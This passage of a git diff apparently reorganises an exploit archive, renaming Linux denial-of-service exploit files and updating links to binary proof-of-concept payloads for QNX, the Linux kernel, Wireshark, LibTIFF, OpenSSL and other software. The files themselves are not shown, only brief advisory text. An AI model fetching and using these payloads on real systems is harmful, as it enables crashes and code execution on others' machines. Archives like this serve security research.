exploits/linux/dos/32697.pl diff --git a/platforms/linux/dos/32726.txt b/exploits/linux/dos/32726.txt similarity index 100% rename from platforms/linux/dos/32726.txt rename to exploits/linux/dos/32726.txt diff --git a/platforms/linux/dos/32740.txt b/exploits/linux/dos/32740.txt similarity index 88% rename from platforms/linux/dos/32740.txt rename to exploits/linux/dos/32740.txt index c96270f84..3d6848265 100644 --- a/platforms/linux/dos/32740.txt +++ b/exploits/linux/dos/32740.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to cause a kernel panic, denying service to leg QNX RTOS 6.4.0 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32740.bin \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32740.bin \ No newline at end of file diff --git a/platforms/linux/dos/32749.txt b/exploits/linux/dos/32749.txt similarity index 100% rename from platforms/linux/dos/32749.txt rename to exploits/linux/dos/32749.txt diff --git a/platforms/linux/dos/32775.txt b/exploits/linux/dos/32775.txt similarity index 93% rename from platforms/linux/dos/32775.txt rename to exploits/linux/dos/32775.txt index 436954397..9b16432e6 100644 --- a/platforms/linux/dos/32775.txt +++ b/exploits/linux/dos/32775.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to cause the kernel to crash, denying service t This issue affects versions prior to Linux kernel 2.6.27.14. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32775.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32775.gz \ No newline at end of file diff --git a/platforms/linux/dos/32800.txt b/exploits/linux/dos/32800.txt similarity index 90% rename from platforms/linux/dos/32800.txt rename to exploits/linux/dos/32800.txt index a54700538..c1d0aabe0 100644 --- a/platforms/linux/dos/32800.txt +++ b/exploits/linux/dos/32800.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to crash applications These issues affect versions prior to Poppler 0.10.4. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32800.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32800.pdf \ No newline at end of file diff --git a/platforms/linux/dos/32815.c b/exploits/linux/dos/32815.c similarity index 100% rename from platforms/linux/dos/32815.c rename to exploits/linux/dos/32815.c diff --git a/platforms/linux/dos/32838.txt b/exploits/linux/dos/32838.txt similarity index 100% rename from platforms/linux/dos/32838.txt rename to exploits/linux/dos/32838.txt diff --git a/platforms/linux/dos/32849.txt b/exploits/linux/dos/32849.txt similarity index 100% rename from platforms/linux/dos/32849.txt rename to exploits/linux/dos/32849.txt diff --git a/platforms/linux/dos/32856.txt b/exploits/linux/dos/32856.txt similarity index 88% rename from platforms/linux/dos/32856.txt rename to exploits/linux/dos/32856.txt index 5d0a359f2..9e66f0c47 100644 --- a/platforms/linux/dos/32856.txt +++ b/exploits/linux/dos/32856.txt @@ -4,4 +4,4 @@ MPlayer is prone to multiple denial-of-service vulnerabilities when handling mal Successfully exploiting this issue allows remote attackers to deny service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32856.aac \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32856.aac \ No newline at end of file diff --git a/platforms/linux/dos/32857.txt b/exploits/linux/dos/32857.txt similarity index 88% rename from platforms/linux/dos/32857.txt rename to exploits/linux/dos/32857.txt index 2b764d00c..e1c839619 100644 --- a/platforms/linux/dos/32857.txt +++ b/exploits/linux/dos/32857.txt @@ -4,4 +4,4 @@ MPlayer is prone to multiple denial-of-service vulnerabilities when handling mal Successfully exploiting this issue allows remote attackers to deny service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32857.ogm \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32857.ogm \ No newline at end of file diff --git a/platforms/linux/dos/3289.c b/exploits/linux/dos/3289.c similarity index 100% rename from platforms/linux/dos/3289.c rename to exploits/linux/dos/3289.c diff --git a/platforms/linux/dos/3290.c b/exploits/linux/dos/3290.c similarity index 100% rename from platforms/linux/dos/3290.c rename to exploits/linux/dos/3290.c diff --git a/platforms/linux/dos/32926.c b/exploits/linux/dos/32926.c similarity index 100% rename from platforms/linux/dos/32926.c rename to exploits/linux/dos/32926.c diff --git a/platforms/linux/dos/32961.html b/exploits/linux/dos/32961.html similarity index 100% rename from platforms/linux/dos/32961.html rename to exploits/linux/dos/32961.html diff --git a/platforms/linux/dos/32964.c b/exploits/linux/dos/32964.c similarity index 100% rename from platforms/linux/dos/32964.c rename to exploits/linux/dos/32964.c diff --git a/platforms/linux/dos/32995.txt b/exploits/linux/dos/32995.txt similarity index 100% rename from platforms/linux/dos/32995.txt rename to exploits/linux/dos/32995.txt diff --git a/platforms/linux/dos/33015.c b/exploits/linux/dos/33015.c similarity index 100% rename from platforms/linux/dos/33015.c rename to exploits/linux/dos/33015.c diff --git a/platforms/linux/dos/33017.txt b/exploits/linux/dos/33017.txt similarity index 93% rename from platforms/linux/dos/33017.txt rename to exploits/linux/dos/33017.txt index e16d8919e..70d85038f 100644 --- a/platforms/linux/dos/33017.txt +++ b/exploits/linux/dos/33017.txt @@ -8,4 +8,4 @@ Acrobat 9.1.1 is vulnerable; other versions may also be affected. NOTE: This BID was previously classified as a buffer-overflow issue, but further analysis reveals that it is a stack-exhaustion issue. Code execution is unlikely. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33017.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33017.pdf \ No newline at end of file diff --git a/platforms/linux/dos/33020.py b/exploits/linux/dos/33020.py similarity index 100% rename from platforms/linux/dos/33020.py rename to exploits/linux/dos/33020.py diff --git a/platforms/linux/dos/33031.html b/exploits/linux/dos/33031.html similarity index 100% rename from platforms/linux/dos/33031.html rename to exploits/linux/dos/33031.html diff --git a/platforms/linux/dos/33036.txt b/exploits/linux/dos/33036.txt similarity index 100% rename from platforms/linux/dos/33036.txt rename to exploits/linux/dos/33036.txt diff --git a/platforms/linux/dos/33040.txt b/exploits/linux/dos/33040.txt similarity index 100% rename from platforms/linux/dos/33040.txt rename to exploits/linux/dos/33040.txt diff --git a/platforms/linux/dos/33041.txt b/exploits/linux/dos/33041.txt similarity index 100% rename from platforms/linux/dos/33041.txt rename to exploits/linux/dos/33041.txt diff --git a/platforms/linux/dos/33042.txt b/exploits/linux/dos/33042.txt similarity index 100% rename from platforms/linux/dos/33042.txt rename to exploits/linux/dos/33042.txt diff --git a/platforms/linux/dos/33043.txt b/exploits/linux/dos/33043.txt similarity index 100% rename from platforms/linux/dos/33043.txt rename to exploits/linux/dos/33043.txt diff --git a/platforms/linux/dos/33049.txt b/exploits/linux/dos/33049.txt similarity index 92% rename from platforms/linux/dos/33049.txt rename to exploits/linux/dos/33049.txt index f596de399..6a342eab6 100644 --- a/platforms/linux/dos/33049.txt +++ b/exploits/linux/dos/33049.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary malicious code in the co LibTIFF 3.8.2 is vulnerable; other versions may be affected as well. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33049.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33049.zip \ No newline at end of file diff --git a/platforms/linux/dos/33073.c b/exploits/linux/dos/33073.c similarity index 100% rename from platforms/linux/dos/33073.c rename to exploits/linux/dos/33073.c diff --git a/platforms/linux/dos/33077.c b/exploits/linux/dos/33077.c similarity index 100% rename from platforms/linux/dos/33077.c rename to exploits/linux/dos/33077.c diff --git a/platforms/linux/dos/33088.txt b/exploits/linux/dos/33088.txt similarity index 84% rename from platforms/linux/dos/33088.txt rename to exploits/linux/dos/33088.txt index cde5e34a3..cc59688f8 100644 --- a/platforms/linux/dos/33088.txt +++ b/exploits/linux/dos/33088.txt @@ -6,5 +6,5 @@ A local attacker can exploit this issue to execute arbitrary code with superuser This issue was introduced in Linux kernel 2.6.30. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33088-1.tgz -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33088-2.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33088-1.tgz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33088-2.tgz \ No newline at end of file diff --git a/platforms/linux/dos/33101.txt b/exploits/linux/dos/33101.txt similarity index 93% rename from platforms/linux/dos/33101.txt rename to exploits/linux/dos/33101.txt index 6b89b1407..3ce5b3403 100644 --- a/platforms/linux/dos/33101.txt +++ b/exploits/linux/dos/33101.txt @@ -6,4 +6,4 @@ The vulnerability is fixed in Firefox 3.0.12 and 3.5. Note that Thunderbird is a This vulnerability was previously covered in BID 35758 (Mozilla Firefox MFSA 2009-34, -35, -36, -37, -39, -40 Multiple Vulnerabilities) but has been assigned its own record to better document the issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33101.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33101.zip \ No newline at end of file diff --git a/platforms/linux/dos/33134.txt b/exploits/linux/dos/33134.txt similarity index 94% rename from platforms/linux/dos/33134.txt rename to exploits/linux/dos/33134.txt index ae4fdd876..20043d082 100644 --- a/platforms/linux/dos/33134.txt +++ b/exploits/linux/dos/33134.txt @@ -13,4 +13,4 @@ This issue affects versions *prior to* the following: Flash Player 10.0.32.18 AIR 1.5.2 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33134.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33134.zip \ No newline at end of file diff --git a/platforms/linux/dos/33148.c b/exploits/linux/dos/33148.c similarity index 100% rename from platforms/linux/dos/33148.c rename to exploits/linux/dos/33148.c diff --git a/platforms/linux/dos/33176.rb b/exploits/linux/dos/33176.rb similarity index 100% rename from platforms/linux/dos/33176.rb rename to exploits/linux/dos/33176.rb diff --git a/platforms/linux/dos/33193.c b/exploits/linux/dos/33193.c similarity index 100% rename from platforms/linux/dos/33193.c rename to exploits/linux/dos/33193.c diff --git a/platforms/linux/dos/33222.txt b/exploits/linux/dos/33222.txt similarity index 88% rename from platforms/linux/dos/33222.txt rename to exploits/linux/dos/33222.txt index d797a720b..36cfd845e 100644 --- a/platforms/linux/dos/33222.txt +++ b/exploits/linux/dos/33222.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to crash the application and deny se These issues affect Wireshark 0.99.6 through 1.2.1. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33222.pcap \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33222.pcap \ No newline at end of file diff --git a/platforms/linux/dos/33223.txt b/exploits/linux/dos/33223.txt similarity index 89% rename from platforms/linux/dos/33223.txt rename to exploits/linux/dos/33223.txt index 859c5f871..7a4ae9f1b 100644 --- a/platforms/linux/dos/33223.txt +++ b/exploits/linux/dos/33223.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to crash the application and deny se These issues affect Wireshark 0.99.6 through 1.2.1. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33223.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33223.zip \ No newline at end of file diff --git a/platforms/linux/dos/33224.txt b/exploits/linux/dos/33224.txt similarity index 88% rename from platforms/linux/dos/33224.txt rename to exploits/linux/dos/33224.txt index 07dbe41ae..50e98a10e 100644 --- a/platforms/linux/dos/33224.txt +++ b/exploits/linux/dos/33224.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to crash the application and deny se These issues affect Wireshark 0.99.6 through 1.2.1. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33224.pcap \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33224.pcap \ No newline at end of file diff --git a/platforms/linux/dos/33228.txt b/exploits/linux/dos/33228.txt similarity index 92% rename from platforms/linux/dos/33228.txt rename to exploits/linux/dos/33228.txt index f881721ec..c65821b72 100644 --- a/platforms/linux/dos/33228.txt +++ b/exploits/linux/dos/33228.txt @@ -6,4 +6,4 @@ Local attackers may be able to exploit this issue to run arbitrary code with ele The Linux Kernel 2.6.31-rc1 through 2.6.31 are vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33228.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33228.tgz \ No newline at end of file diff --git a/platforms/linux/dos/33230.txt b/exploits/linux/dos/33230.txt similarity index 100% rename from platforms/linux/dos/33230.txt rename to exploits/linux/dos/33230.txt diff --git a/platforms/linux/dos/33233.txt b/exploits/linux/dos/33233.txt similarity index 83% rename from platforms/linux/dos/33233.txt rename to exploits/linux/dos/33233.txt index 63c2bef08..0aa075c27 100644 --- a/platforms/linux/dos/33233.txt +++ b/exploits/linux/dos/33233.txt @@ -6,5 +6,5 @@ Attackers may leverage these issues to execute arbitrary code in the context of FFmpeg 0.5 is affected; other versions may also be vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33233-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33233-2.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33233-1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33233-2.zip \ No newline at end of file diff --git a/platforms/linux/dos/33269.txt b/exploits/linux/dos/33269.txt similarity index 100% rename from platforms/linux/dos/33269.txt rename to exploits/linux/dos/33269.txt diff --git a/platforms/linux/dos/33283.txt b/exploits/linux/dos/33283.txt similarity index 94% rename from platforms/linux/dos/33283.txt rename to exploits/linux/dos/33283.txt index 913edb9ea..3ea20f351 100644 --- a/platforms/linux/dos/33283.txt +++ b/exploits/linux/dos/33283.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue by supplying a malicious PDF file or webpage. This issue was previously covered in BID 36638 (Adobe Reader and Acrobat October 2009 Multiple Remote Vulnerabilities), but has been given its own record to better document it. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33283.tar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33283.tar \ No newline at end of file diff --git a/platforms/linux/dos/33289.txt b/exploits/linux/dos/33289.txt similarity index 100% rename from platforms/linux/dos/33289.txt rename to exploits/linux/dos/33289.txt diff --git a/platforms/linux/dos/33306.txt b/exploits/linux/dos/33306.txt similarity index 100% rename from platforms/linux/dos/33306.txt rename to exploits/linux/dos/33306.txt diff --git a/platforms/linux/dos/33312.txt b/exploits/linux/dos/33312.txt similarity index 100% rename from platforms/linux/dos/33312.txt rename to exploits/linux/dos/33312.txt diff --git a/platforms/linux/dos/33314.html b/exploits/linux/dos/33314.html similarity index 100% rename from platforms/linux/dos/33314.html rename to exploits/linux/dos/33314.html diff --git a/platforms/linux/dos/33397.txt b/exploits/linux/dos/33397.txt similarity index 100% rename from platforms/linux/dos/33397.txt rename to exploits/linux/dos/33397.txt diff --git a/platforms/linux/dos/33398.txt b/exploits/linux/dos/33398.txt similarity index 100% rename from platforms/linux/dos/33398.txt rename to exploits/linux/dos/33398.txt diff --git a/platforms/linux/dos/33480.txt b/exploits/linux/dos/33480.txt similarity index 100% rename from platforms/linux/dos/33480.txt rename to exploits/linux/dos/33480.txt diff --git a/platforms/linux/dos/33524.txt b/exploits/linux/dos/33524.txt similarity index 92% rename from platforms/linux/dos/33524.txt rename to exploits/linux/dos/33524.txt index 7608a7779..463c9decd 100644 --- a/platforms/linux/dos/33524.txt +++ b/exploits/linux/dos/33524.txt @@ -9,4 +9,4 @@ Successful exploits will cause the application to crash, denying service to legi OpenOffice 3.1.0 and 3.1.1 on Microsoft Windows are affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33524.rar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33524.rar \ No newline at end of file diff --git a/platforms/linux/dos/33549.txt b/exploits/linux/dos/33549.txt similarity index 93% rename from platforms/linux/dos/33549.txt rename to exploits/linux/dos/33549.txt index ba49d5016..170048dec 100644 --- a/platforms/linux/dos/33549.txt +++ b/exploits/linux/dos/33549.txt @@ -8,4 +8,4 @@ Successful exploits will cause the application to crash, denying service to legi OpenOffice 3.1.0 and 3.1.1 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33549.slk \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33549.slk \ No newline at end of file diff --git a/platforms/linux/dos/33571.txt b/exploits/linux/dos/33571.txt similarity index 100% rename from platforms/linux/dos/33571.txt rename to exploits/linux/dos/33571.txt diff --git a/platforms/linux/dos/33581.txt b/exploits/linux/dos/33581.txt similarity index 100% rename from platforms/linux/dos/33581.txt rename to exploits/linux/dos/33581.txt diff --git a/platforms/linux/dos/33591.sh b/exploits/linux/dos/33591.sh similarity index 100% rename from platforms/linux/dos/33591.sh rename to exploits/linux/dos/33591.sh diff --git a/platforms/linux/dos/33592.txt b/exploits/linux/dos/33592.txt similarity index 100% rename from platforms/linux/dos/33592.txt rename to exploits/linux/dos/33592.txt diff --git a/platforms/linux/dos/33635.c b/exploits/linux/dos/33635.c similarity index 100% rename from platforms/linux/dos/33635.c rename to exploits/linux/dos/33635.c diff --git a/platforms/linux/dos/33672.txt b/exploits/linux/dos/33672.txt similarity index 100% rename from platforms/linux/dos/33672.txt rename to exploits/linux/dos/33672.txt diff --git a/platforms/linux/dos/33801.txt b/exploits/linux/dos/33801.txt similarity index 100% rename from platforms/linux/dos/33801.txt rename to exploits/linux/dos/33801.txt diff --git a/platforms/linux/dos/33850.txt b/exploits/linux/dos/33850.txt similarity index 100% rename from platforms/linux/dos/33850.txt rename to exploits/linux/dos/33850.txt diff --git a/platforms/linux/dos/33886.txt b/exploits/linux/dos/33886.txt similarity index 100% rename from platforms/linux/dos/33886.txt rename to exploits/linux/dos/33886.txt diff --git a/platforms/linux/dos/3396.php b/exploits/linux/dos/3396.php similarity index 100% rename from platforms/linux/dos/3396.php rename to exploits/linux/dos/3396.php diff --git a/platforms/linux/dos/33965.txt b/exploits/linux/dos/33965.txt similarity index 100% rename from platforms/linux/dos/33965.txt rename to exploits/linux/dos/33965.txt diff --git a/platforms/linux/dos/33966.rb b/exploits/linux/dos/33966.rb similarity index 100% rename from platforms/linux/dos/33966.rb rename to exploits/linux/dos/33966.rb diff --git a/platforms/linux/dos/34102.py b/exploits/linux/dos/34102.py similarity index 100% rename from platforms/linux/dos/34102.py rename to exploits/linux/dos/34102.py diff --git a/platforms/linux/dos/34133.txt b/exploits/linux/dos/34133.txt similarity index 100% rename from platforms/linux/dos/34133.txt rename to exploits/linux/dos/34133.txt diff --git a/platforms/linux/dos/3415.html b/exploits/linux/dos/3415.html similarity index 100% rename from platforms/linux/dos/3415.html rename to exploits/linux/dos/3415.html diff --git a/platforms/linux/dos/34164.pl b/exploits/linux/dos/34164.pl similarity index 100% rename from platforms/linux/dos/34164.pl rename to exploits/linux/dos/34164.pl diff --git a/platforms/linux/dos/34228.txt b/exploits/linux/dos/34228.txt similarity index 88% rename from platforms/linux/dos/34228.txt rename to exploits/linux/dos/34228.txt index 5bdee5084..4b4a93140 100644 --- a/platforms/linux/dos/34228.txt +++ b/exploits/linux/dos/34228.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to crash the affected application, denying serv Mumble versions 1.2.2 and prior are vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34228.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34228.zip \ No newline at end of file diff --git a/platforms/linux/dos/34249.txt b/exploits/linux/dos/34249.txt similarity index 92% rename from platforms/linux/dos/34249.txt rename to exploits/linux/dos/34249.txt index 4d5c6b052..4c94611dc 100644 --- a/platforms/linux/dos/34249.txt +++ b/exploits/linux/dos/34249.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to cause the applications to become unrespo Freeciv 2.2.1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34249.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34249.zip \ No newline at end of file diff --git a/platforms/linux/dos/34278.txt b/exploits/linux/dos/34278.txt similarity index 89% rename from platforms/linux/dos/34278.txt rename to exploits/linux/dos/34278.txt index a2fe61585..a073703b6 100644 --- a/platforms/linux/dos/34278.txt +++ b/exploits/linux/dos/34278.txt @@ -4,4 +4,4 @@ LibTIFF is prone to a denial-of-service vulnerability because it fails to proper An attacker can exploit this issue to crash an application that uses the vulnerable library, denying service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34278.tif \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34278.tif \ No newline at end of file diff --git a/platforms/linux/dos/34279.txt b/exploits/linux/dos/34279.txt similarity index 89% rename from platforms/linux/dos/34279.txt rename to exploits/linux/dos/34279.txt index e0ac4df8b..c323d2b94 100644 --- a/platforms/linux/dos/34279.txt +++ b/exploits/linux/dos/34279.txt @@ -4,4 +4,4 @@ LibTIFF is prone to a denial-of-service vulnerability because it fails to proper An attacker can exploit this issue to crash an application that uses the vulnerable library, denying service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34279.tif \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34279.tif \ No newline at end of file diff --git a/platforms/linux/dos/34348.txt b/exploits/linux/dos/34348.txt similarity index 100% rename from platforms/linux/dos/34348.txt rename to exploits/linux/dos/34348.txt diff --git a/platforms/linux/dos/34356.txt b/exploits/linux/dos/34356.txt similarity index 100% rename from platforms/linux/dos/34356.txt rename to exploits/linux/dos/34356.txt diff --git a/platforms/linux/dos/34364.html b/exploits/linux/dos/34364.html similarity index 100% rename from platforms/linux/dos/34364.html rename to exploits/linux/dos/34364.html diff --git a/platforms/linux/dos/34375.txt b/exploits/linux/dos/34375.txt similarity index 100% rename from platforms/linux/dos/34375.txt rename to exploits/linux/dos/34375.txt diff --git a/platforms/linux/dos/3441.c b/exploits/linux/dos/3441.c similarity index 100% rename from platforms/linux/dos/3441.c rename to exploits/linux/dos/3441.c diff --git a/platforms/linux/dos/34427.txt b/exploits/linux/dos/34427.txt similarity index 91% rename from platforms/linux/dos/34427.txt rename to exploits/linux/dos/34427.txt index ca62f7dde..88da05704 100644 --- a/platforms/linux/dos/34427.txt +++ b/exploits/linux/dos/34427.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue may allow an attacker to execute arbitrary co The issue affects OpenSSL 1.0.0a; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34427.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34427.zip \ No newline at end of file diff --git a/platforms/linux/dos/34506.txt b/exploits/linux/dos/34506.txt similarity index 100% rename from platforms/linux/dos/34506.txt rename to exploits/linux/dos/34506.txt diff --git a/platforms/linux/dos/34510.txt b/exploits/linux/dos/34510.txt similarity index 100% rename from platforms/linux/dos/34510.txt rename to exploits/linux/dos/34510.txt diff --git a/platforms/linux/dos/34520.txt b/exploits/linux/dos/34520.txt similarity index 100% rename from platforms/linux/dos/34520.txt rename to exploits/linux/dos/34520.txt diff --git a/platforms/linux/dos/34521.txt b/exploits/linux/dos/34521.txt similarity index 100% rename from platforms/linux/dos/34521.txt rename to exploits/linux/dos/34521.txt diff --git a/platforms/linux/dos/34522.txt b/exploits/linux/dos/34522.txt similarity index 100% rename from platforms/linux/dos/34522.txt rename to exploits/linux/dos/34522.txt diff --git a/platforms/linux/dos/34953.txt b/exploits/linux/dos/34953.txt similarity index 96% rename from platforms/linux/dos/34953.txt rename to exploits/linux/dos/34953.txt index b097a82b6..fa4048ef1 100644 --- a/platforms/linux/dos/34953.txt +++ b/exploits/linux/dos/34953.txt @@ -5,7 +5,7 @@ FUSE fusermount tool is prone to a race-condition vulnerability. A local attacker can exploit this issue to cause a denial of service by unmounting any filesystem of the system. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34953.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34953.zip diff --git a/platforms/linux/dos/35013.c b/exploits/linux/dos/35013.c similarity index 100% rename from platforms/linux/dos/35013.c rename to exploits/linux/dos/35013.c diff --git a/platforms/linux/dos/35061.c b/exploits/linux/dos/35061.c similarity index 100% rename from platforms/linux/dos/35061.c rename to exploits/linux/dos/35061.c diff --git a/platforms/linux/dos/35081.txt b/exploits/linux/dos/35081.txt similarity index 95% rename from platforms/linux/dos/35081.txt rename to exploits/linux/dos/35081.txt index 2869114a7..ef5b9a768 100644 --- a/platforms/linux/dos/35081.txt +++ b/exploits/linux/dos/35081.txt @@ -23,7 +23,7 @@ out-of-bounds crashes due to very limited range checking. In binutils $ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2 -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081.bin +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/35081.bin ... $ strings strings-bfd-badptr2 diff --git a/platforms/linux/dos/35162.cob b/exploits/linux/dos/35162.cob similarity index 100% rename from platforms/linux/dos/35162.cob rename to exploits/linux/dos/35162.cob diff --git a/platforms/linux/dos/35173.txt b/exploits/linux/dos/35173.txt similarity index 95% rename from platforms/linux/dos/35173.txt rename to exploits/linux/dos/35173.txt index ac8f6c66d..53db738bf 100644 --- a/platforms/linux/dos/35173.txt +++ b/exploits/linux/dos/35173.txt @@ -7,7 +7,7 @@ Attached three PoCs (malformed ELFs) and a screenshot of the panic. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35173.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/35173.zip ---- diff --git a/platforms/linux/dos/35240.c b/exploits/linux/dos/35240.c similarity index 100% rename from platforms/linux/dos/35240.c rename to exploits/linux/dos/35240.c diff --git a/platforms/linux/dos/35302.c b/exploits/linux/dos/35302.c similarity index 100% rename from platforms/linux/dos/35302.c rename to exploits/linux/dos/35302.c diff --git a/platforms/linux/dos/35403.c b/exploits/linux/dos/35403.c similarity index 100% rename from platforms/linux/dos/35403.c rename to exploits/linux/dos/35403.c diff --git a/platforms/linux/dos/35404.c b/exploits/linux/dos/35404.c similarity index 100% rename from platforms/linux/dos/35404.c rename to exploits/linux/dos/35404.c diff --git a/platforms/linux/dos/35432.txt b/exploits/linux/dos/35432.txt similarity index 88% rename from platforms/linux/dos/35432.txt rename to exploits/linux/dos/35432.txt index 86586d961..dbc809ff6 100644 --- a/platforms/linux/dos/35432.txt +++ b/exploits/linux/dos/35432.txt @@ -4,4 +4,4 @@ Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL- An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35432.pcap \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/35432.pcap \ No newline at end of file diff --git a/platforms/linux/dos/35445.txt b/exploits/linux/dos/35445.txt similarity index 100% rename from platforms/linux/dos/35445.txt rename to exploits/linux/dos/35445.txt diff --git a/platforms/linux/dos/35478.txt b/exploits/linux/dos/35478.txt similarity index 100% rename from platforms/linux/dos/35478.txt rename to exploits/linux/dos/35478.txt diff --git a/platforms/linux/dos/35580.rb b/exploits/linux/dos/35580.rb similarity index 100% rename from platforms/linux/dos/35580.rb rename to exploits/linux/dos/35580.rb diff --git a/platforms/linux/dos/35600.c b/exploits/linux/dos/35600.c similarity index 100% rename from platforms/linux/dos/35600.c rename to exploits/linux/dos/35600.c diff --git a/platforms/linux/dos/35738.php b/exploits/linux/dos/35738.php similarity index 100% rename from platforms/linux/dos/35738.php rename to exploits/linux/dos/35738.php diff --git a/platforms/linux/dos/35820.c b/exploits/linux/dos/35820.c similarity index 100% rename from platforms/linux/dos/35820.c rename to exploits/linux/dos/35820.c diff --git a/platforms/linux/dos/3586.php b/exploits/linux/dos/3586.php similarity index 100% rename from platforms/linux/dos/3586.php rename to exploits/linux/dos/3586.php diff --git a/platforms/linux/dos/35951.py b/exploits/linux/dos/35951.py similarity index 100% rename from platforms/linux/dos/35951.py rename to exploits/linux/dos/35951.py diff --git a/platforms/linux/dos/35957.txt b/exploits/linux/dos/35957.txt similarity index 100% rename from platforms/linux/dos/35957.txt rename to exploits/linux/dos/35957.txt diff --git a/platforms/linux/dos/36024.txt b/exploits/linux/dos/36024.txt similarity index 100% rename from platforms/linux/dos/36024.txt rename to exploits/linux/dos/36024.txt diff --git a/platforms/linux/dos/36190.txt b/exploits/linux/dos/36190.txt similarity index 100% rename from platforms/linux/dos/36190.txt rename to exploits/linux/dos/36190.txt diff --git a/platforms/linux/dos/36267.c b/exploits/linux/dos/36267.c similarity index 100% rename from platforms/linux/dos/36267.c rename to exploits/linux/dos/36267.c diff --git a/platforms/linux/dos/36268.c b/exploits/linux/dos/36268.c similarity index 100% rename from platforms/linux/dos/36268.c rename to exploits/linux/dos/36268.c diff --git a/platforms/linux/dos/36388.py b/exploits/linux/dos/36388.py similarity index 100% rename from platforms/linux/dos/36388.py rename to 